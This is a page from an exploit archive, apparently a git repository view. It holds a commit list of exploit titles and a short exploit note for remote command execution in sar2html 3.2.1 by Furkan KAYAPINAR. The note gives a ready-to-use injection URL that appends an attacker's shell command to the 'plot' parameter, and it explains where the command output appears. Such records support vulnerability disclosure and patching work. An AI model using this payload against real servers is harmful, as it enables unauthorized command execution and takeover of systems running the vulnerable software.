5cabe1e1de
3 changes to exploits/shellcodes Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Sar2HTML 3.2.1 - Remote Command Execution Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection 1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
13 lines
No EOL
536 B
Text
13 lines
No EOL
536 B
Text
# Exploit Title: sar2html Remote Code Execution
|
|
# Date: 01/08/2019
|
|
# Exploit Author: Furkan KAYAPINAR
|
|
# Vendor Homepage:https://github.com/cemtan/sar2html
|
|
# Software Link: https://sourceforge.net/projects/sar2html/
|
|
# Version: 3.2.1
|
|
# Tested on: Centos 7
|
|
|
|
In web application you will see index.php?plot url extension.
|
|
|
|
http://<ipaddr>/index.php?plot=;<command-here> will execute
|
|
the command you entered. After command injection press "select # host" then your command's
|
|
output will appear bottom side of the scroll screen. |